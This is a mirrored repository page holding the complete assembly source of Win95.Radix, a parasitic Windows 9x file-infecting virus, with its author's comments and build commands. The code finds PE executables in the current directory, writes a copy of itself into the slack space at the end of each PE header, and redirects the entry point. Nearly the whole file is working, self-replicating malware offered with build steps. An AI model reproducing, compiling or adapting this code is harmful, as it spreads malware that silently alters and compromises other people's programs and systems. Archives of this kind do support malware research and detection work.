mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 11:26:11 +00:00
239 lines
4.5 KiB
NASM
239 lines
4.5 KiB
NASM
|
; Win95.Radix by Radix16[MIONS]
|
||
|
; Made in Czech republic
|
||
|
;
|
||
|
;Hi,
|
||
|
;
|
||
|
;It's my first Ring3 virus for Win9x.Virus not testing WinNT system.
|
||
|
;
|
||
|
;Target : PE filez
|
||
|
;Virus size : 405(402)
|
||
|
;Resident : NO
|
||
|
;Polymorhic : NO
|
||
|
;
|
||
|
;Virus not dangerous, but .....
|
||
|
;
|
||
|
;Decription AVP:
|
||
|
;
|
||
|
;http://www.avp.ch/avpve/newexe/win95/radix.stm
|
||
|
;
|
||
|
;It is a harmless nonmemory resident parasitic Win9x virus. It searches
|
||
|
;for PE EXE files in the current directory, then writes itself to the
|
||
|
;middle of the file, to not used space at the end of the PE header.
|
||
|
;
|
||
|
;The virus does not manifest itself in any way. It contains the text:
|
||
|
;
|
||
|
; Radix16
|
||
|
|
||
|
;Greets to :
|
||
|
; Worf[MIONS]
|
||
|
; VirusBuster/29
|
||
|
; Prizzy/29A
|
||
|
;
|
||
|
;
|
||
|
;How to build:
|
||
|
; tasm32 -ml -m5 radix.asm
|
||
|
; tlink32 -Tpe -aa -c -x radix.obj,,, import32
|
||
|
; pewrsec radix.exe
|
||
|
;
|
||
|
;Contacty mee : Radix16@atlas.cz
|
||
|
; Radix16.cjb.net
|
||
|
|
||
|
.386p
|
||
|
locals
|
||
|
.Model Flat,STDCALL
|
||
|
|
||
|
extrn ExitProcess :proc
|
||
|
extrn GetModuleHandleA : proc
|
||
|
|
||
|
|
||
|
.Data
|
||
|
db ?
|
||
|
|
||
|
.Code
|
||
|
|
||
|
vStart label byte
|
||
|
Start:
|
||
|
|
||
|
db 68h
|
||
|
;Save old eip
|
||
|
oldip: dd offset exit
|
||
|
pushad
|
||
|
Call Next
|
||
|
id db 'Radix16'
|
||
|
Next:
|
||
|
pop ebp
|
||
|
|
||
|
|
||
|
mov esi,KERNEL32+3ch
|
||
|
lodsd
|
||
|
add eax,KERNEL32
|
||
|
xchg eax,esi
|
||
|
mov esi,dword ptr [esi+78h]
|
||
|
lea esi,dword ptr [esi+1ch+KERNEL32]
|
||
|
lodsd
|
||
|
mov eax,dword ptr [eax+KERNEL32]
|
||
|
add eax,KERNEL32
|
||
|
|
||
|
push eax
|
||
|
push 20060000h
|
||
|
push 0h
|
||
|
push 1h
|
||
|
db 68h
|
||
|
currPage:
|
||
|
dd FSTGENPAGE
|
||
|
push 1000dh
|
||
|
call eax
|
||
|
pop dword ptr [_VxDCALL0+ebp-X]
|
||
|
inc eax
|
||
|
jz _exit
|
||
|
inc eax
|
||
|
;allocation memory
|
||
|
push 00020000h or 00040000h
|
||
|
push 2h
|
||
|
push 80060000h
|
||
|
push 00010000h
|
||
|
call dword ptr [_VxDCALL0+ebp-X]
|
||
|
|
||
|
|
||
|
mov dword ptr [memory+ebp-X],eax
|
||
|
|
||
|
push 00020000h or 00040000h or 80000000h or 8h
|
||
|
push 0h
|
||
|
push 1h
|
||
|
push 2h
|
||
|
shr eax,12
|
||
|
push eax
|
||
|
push 00010001h
|
||
|
call dword ptr [_VxDCALL0+ebp-X]
|
||
|
;Create DTA
|
||
|
mov ah,1ah
|
||
|
mov edx,dword ptr [memory+ebp-X] ;buffer
|
||
|
add edx,1000h
|
||
|
call int21
|
||
|
|
||
|
mov ah,4eh ;FindFirstFile
|
||
|
lea edx,[_exe+ebp-X] ;What search
|
||
|
xor ecx,ecx ;normal attributes
|
||
|
|
||
|
tryanother:
|
||
|
call int21
|
||
|
jc _exit ;is filez ?
|
||
|
|
||
|
call _infect
|
||
|
|
||
|
mov ah,4fh ;FindNextFile
|
||
|
Jmp tryanother
|
||
|
|
||
|
_exit:
|
||
|
popad
|
||
|
ret
|
||
|
|
||
|
_exe db '*.*',0 ;filez search
|
||
|
|
||
|
int21:
|
||
|
;VxDCALL services
|
||
|
push ecx
|
||
|
push eax
|
||
|
push 002a0010h
|
||
|
call dword ptr [_VxDCALL0+ebp-X]
|
||
|
ret
|
||
|
|
||
|
FP: ;Set file pointer
|
||
|
mov ah,42h
|
||
|
cdq ;xor dx,dx
|
||
|
xor cx,cx
|
||
|
call int21
|
||
|
ret
|
||
|
|
||
|
|
||
|
_infect:
|
||
|
|
||
|
|
||
|
mov edx,dword ptr [memory+ebp-X] ;Name file
|
||
|
add edx,101eh
|
||
|
|
||
|
mov ax,3d02h ;Open File R/W
|
||
|
call int21
|
||
|
jc quit ;Error ?
|
||
|
|
||
|
xchg eax,ebx ;FileHandle
|
||
|
|
||
|
mov ah,3fh ;Read File
|
||
|
mov ecx,1000h ;Read 1000h bytes
|
||
|
mov edx,dword ptr [memory+ebp-X]
|
||
|
call int21
|
||
|
jc quitz ;Error ?
|
||
|
|
||
|
|
||
|
mov edi,edx
|
||
|
cmp word ptr [edi],'ZM' ;Test Header (EXE)
|
||
|
jne quitz ;yes or no ?
|
||
|
cmp word ptr [edi+32h],'61' ;Test infection
|
||
|
je quitz ;Yes, virus is in file ?
|
||
|
mov word ptr [edi+32h],'61' ;No ,Save ID to file
|
||
|
add edi,dword ptr [edi+3ch] ;Testing Portable Executable(PE)
|
||
|
cmp word ptr [edi],'EP'
|
||
|
jne quitz
|
||
|
|
||
|
|
||
|
mov esi,edi
|
||
|
mov eax,18h ;Shift image header
|
||
|
add ax,word ptr [edi+14h]
|
||
|
add edi,eax
|
||
|
|
||
|
;Search end section
|
||
|
movzx cx,word ptr [esi+06h]
|
||
|
mov ax,28h
|
||
|
mul cx
|
||
|
add edi,eax
|
||
|
|
||
|
mov ecx,dword ptr [esi+2ch]
|
||
|
mov dword ptr [esi+54h],ecx
|
||
|
|
||
|
push edi
|
||
|
sub edi,dword ptr [memory+ebp-X]
|
||
|
xchg edi,dword ptr [esi+28h]
|
||
|
mov eax,dword ptr [esi+34h]
|
||
|
add edi,eax
|
||
|
shr eax,12
|
||
|
mov dword ptr [currPage+ebp-X],eax
|
||
|
mov dword ptr [oldip+ebp-X],edi ;Save old EIP
|
||
|
pop edi
|
||
|
|
||
|
|
||
|
mov ecx,VirusSize
|
||
|
lea esi,[vStart+ebp-X]
|
||
|
rep movsb ;CopyVirus
|
||
|
|
||
|
xor al,al ;SetFilePointer 0=beginning file
|
||
|
call FP ;mov al,0
|
||
|
|
||
|
mov ah,40h ;Write to file
|
||
|
mov ecx,1000h
|
||
|
mov edx,dword ptr [memory+ebp-X]
|
||
|
call int21
|
||
|
|
||
|
quitz:
|
||
|
mov ah,3eh ;CloseFile
|
||
|
call int21
|
||
|
|
||
|
quit:
|
||
|
|
||
|
ret
|
||
|
|
||
|
exit:
|
||
|
|
||
|
vEnd label byte
|
||
|
ret
|
||
|
VirusSize equ vEnd-vStart
|
||
|
KERNEL32 equ 0bff70000h ;Win9X kernel address
|
||
|
FSTGENPAGE equ 000400000h/1000h
|
||
|
X equ offset id
|
||
|
_VxDCALL0 dd ?
|
||
|
memory dd ? ;Buffer
|
||
|
|
||
|
Virual_End:
|
||
|
|
||
|
ends
|
||
|
End Start
|